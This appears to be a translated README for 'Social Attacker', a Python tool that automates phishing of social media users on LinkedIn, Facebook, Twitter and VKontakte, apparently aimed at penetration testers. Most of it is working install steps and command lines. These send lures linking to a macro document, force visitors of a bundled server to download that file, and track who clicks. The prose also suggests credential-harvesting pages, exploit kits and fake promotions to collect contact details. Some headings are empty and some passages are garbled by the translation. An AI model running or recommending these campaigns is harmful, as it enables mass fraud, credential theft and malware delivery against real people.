Social Attacker is the first open source multi-site automated social media phishing framework. It allows you to automate phishing social media users on a large scale by processing target connections and messages.
You only need to provide Social Attacker with a list of phishing emails and target profiles (by manual or Social Mapper). Then, within the time frame you set, it will try to connect to the target, and if the target accepts it, it will send them a phishing email. In addition, it can also scrape the target’s public profile history and use basic message generation to create a personal message specific to that person as an alternative to sending the same phishing to all targets.
Social Attacker supports the following social media platforms:
Other features include:
The name of the organization, search via LinkedIn
A named image folder
A CSV file containing the name and URL of the online image
The use of Social Attackers is similar to Social Mapper, so if you are familiar with the tool, it should be easy to use.
Social Attacker is mainly aimed at penetration testers and red team members, who can use it to phish targeted social media profiles. The following are some simple ideas for everyone:
Create detailed HTML reports that show how your organization’s employees reacted to random accounts that added them, and send them links to click on various social media platforms.
“Friend” and connect to your target, so you can directly send them links to implants or macro documents. Recent statistics show that social media users are more than twice as likely to click on links and open documents as users who send them via email.
Create custom phishing campaigns for various social media sites. Redirect them to a more formal and realistic-looking login form credential acquisition interface, or a site automatically executed by a hosted exploitkit or Metasploits browser controlled by you.
Through some fake promotions or coupons, fraudulently obtain the user’s email and phone number for subsequent phishing attacks.
Install & use
Since this is a Python-based tool, in theory it should run on Linux, ChromeOS (developer mode) and macOS. The main dependencies are Firefox, Selenium and Geckodriver. Please follow the following four steps to install and set up the tool:
1. Install the latest version of Mac OS Mozilla Firefox:
Or for Debian/Kali (except Ubuntu) to obtain a non-ESR version of Firefox:
sudo add-apt-repository ppa:mozillateam/firefox-next && sudo apt update && sudo apt upgrade
Make sure that the new version of Firefox is in the path. Please add it manually if it is not there.
2. Install Geckodriver for your operating system and make sure it is in the path. On Mac you can install it under /usr/local/bin, on ChromeOS you can install it under /usr/local/bin, and on Linux you can install it under /usr/bin.
Download the latest version of Geckodriver here:
3. Install the required libraries:
On Linux and macOS:
git clone https://github.com/Greenwolf/social_attacker cd social_attacker/setup python -m pip install --no-cache-dir -r requirements.txt
Check the setup/setup-mac.txt file on the Mac for additional xquartz installation instructions.
4. Provide Social Attacker with credentials to log in to social media services:
Open social_attacker.py and enter the social media credentials into the global variables at the top of the file.
5. For Facebook, please ensure that the language of the account you provide credentials is set to “English (US)” during runtime. Also, please make sure that all your accounts are working properly and you can log in without two-factor authentication.
Social Attacker is run from the command line using a combination of required and optional parameters. You can specify options, such as enabling custom phishing email generation (-mm), setting the waiting time before phishing after adding, and specifying the target website.
To start the tool, 4 parameters must be provided, namely the input format, input file or folder, and basic operating mode:
-f, --format : Specify the function to perform 'prepare' (gather LinkedIn connection degrees for a company), 'add' (everyone on list),'check'(who has accepted the request), 'generate'(unique phish messages),'phish'(all that have accepted), 'addphish'(Add & Phish everyone on list) or 'checkclicks' (to see who has clicked the links) -i, --input : The name of the csv file containing links to profiles, must include columns with header titled "Full Name","LinkedIn","Facebook", "Twitter","Vkontakte" or the social attacker csv with tracking IDs if using the checklicks option
In addition, include at least one or more of the following social media sites to check:
-a, --all : Selects all of the options below and phishes on every site that Social Attacker has credentials for -fb, --facebook : Perform defined function on Facebook -tw, --twitter : Perform defined function on Twitter -li, --linkedin : Perform defined function on LinkedIn -vk, --vkontakte : Perform defined function on VKontakte
In addition to the above mandatory parameters, you can also set other optional parameters to add other customizations to the way Social Mapper operates:
-m, --message : Sets the default message to send to each user as a phish. -mm, --markovmessage: The phishing link to be appended to the end of a custom message generation attempt -ml, --markovlength : The max length of custom message generation, best to keep short and snappy (default 140 chars) -w, --wait : Set the time in hours between adding targets and sending them a phishing message when using the 'addphish' function. For example you may want to wait 24 or 48 hours to give targets time to accept connection requests. -wl, --weblogs : The web logs generated by sa_server.py (social_attacker_server.log), which can be parsed to extract clicks and user agents. This is needed to generate a final HTML report.
Here are a few running examples for different use cases:
Prepare your linkedin account for connecting to a company to help alleviate 3rd degree requirements python3 social_attacker.py -f prepare -i "https://www.linkedin.com/company/example-company/" -li Adding/Connecting to Facebook & LinkedIn users python3 social_attacker.py -f add -i social_mapper_results.csv -fb -li Checking which Facebook & LinkedIn user have accepted the connection and can be phished python3 social_attacker.py -f check -i social_mapper_results.csv -fb -li Phish users with set message. The string [TRACKING_ID] is overwritten for each phish with a unique 5 character HEX string to tracking purposes. python3 social_attacker.py -f phish -i social_mapper_results.csv -fb -li -m "Hey come download this file https://greenwolf.com/macro.doc?t=[TRACKING_ID]" Perform adding and phishing in one go, with delay between in hours(48h in this case for 2 days). python3 social_attacker.py -f addphish -i social_mapper_results.csv -fb -li -w 48 -m "Hey come download this file https://greenwolf.com/macro.doc?t=[TRACKING_ID]" Generate unique custom markov messages for each user based on timeline/post history (only for users who have accepted add requests). This is output to a csv file for review/editing, Where Markov cant be generated it is displayed with "-", these will be replaced with the set standard message (-m) when phishing later. python3 social_attacker.py -f generate -i social_mapper_results.csv -fb -li Same as above but set the max custom message length to 100 characters instead the default 140. python3 social_attacker.py -f generate -i social_mapper_results.csv -fb -li -ml 100 Phish users by feeding in the csv output from the 'generate' command. Needs a -mm field with the link to be appended to the end of the message, or overwrite another link mid message. Also needs a default message to fall back to. python3 social_attacker.py -f phish -i social_attacker_markov_results.csv -fb -li -mm "https://greenwolf.com/macro.doc?t=[TRACKING_ID]" -m "Hey come download this file https://greenwolf.com/macro.doc?t=[TRACKING_ID]" Perform adding and phish in one go with custom markov messages enabled, no review process here though, enjoyed the twitterese & chaos! python3 social_attacker.py -f addphish -i social_mapper_results.csv -fb -li -w 48 -mm "https://greenwolf.com/macro.doc?t=[TRACKING_ID]" -m "Hey come download this file https://greenwolf.com/macro.doc?t=[TRACKING_ID]" Generate a final phishing html report. This displays has clicked on your links if you instructed social_attacker.py to include a [TRACKING_ID] in your phishing messages. It requires a specfic log output from sa_server.py, so make sure you are writing logs in the same format if you use IIS or Apache etc. Feed in your phishing results and this log file to generate your report. This function has features to discount automated crawlers which will poison your logs. python3 social_attacker.py -f checkclicks -i social_attacker_phish_results.csv -wl apache-logs.txt
Social Attacker provides a lightweight python HTTPS web server, which can be set up with an SSL certificate (see get-a-ssl-certificate.txt). The server is very easy to use, for example, you can put the ssl certificate in the same directory as sa_server.py, and it will overwrite the items in the web folder.
You can also use the –file parameter to force a file. For example,’–file macro.doc’ will force clicking to the macro.doc link from these two addresses.
Server all items in the web folder on port 443 python3 sa_server.py -p 443 Force all visitors to download macro.doc python3 sa_server.py -p 443 --file macro.doc
If you want to use other server types and generate HTML reports at the same time, the logs need to be in the following format:
IP - datetime timezone - User Agent - Command Path head -n 5 social_attacker_server.log 10.10.10.10 - 2019-06-18 01:46:29 GMT - User-Agent: curl/7.54.0 - GET /macro.doc 184.108.40.206 - 2019-06-18 02:09:32 GMT - User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3 - GET /macro.doc 220.127.116.11 - 2019-06-18 02:09:32 GMT - User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G920V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 - GET / 18.104.22.168 - 2019-06-18 02:09:32 GMT - User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G920V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 - GET /robots.txt 10.10.10.10 - 2019-06-18 02:09:32 GMT - User-Agent: curl/7.54.0 - GET /macro.doc
Fixes & suggestions
Social media sites often change their page format and class names. If Social Attacker does not work on a particular site, please check the documentation section for answers and suggestions on how to fix it. In addition, you can submit a pull request to us at any time, thanks for your support!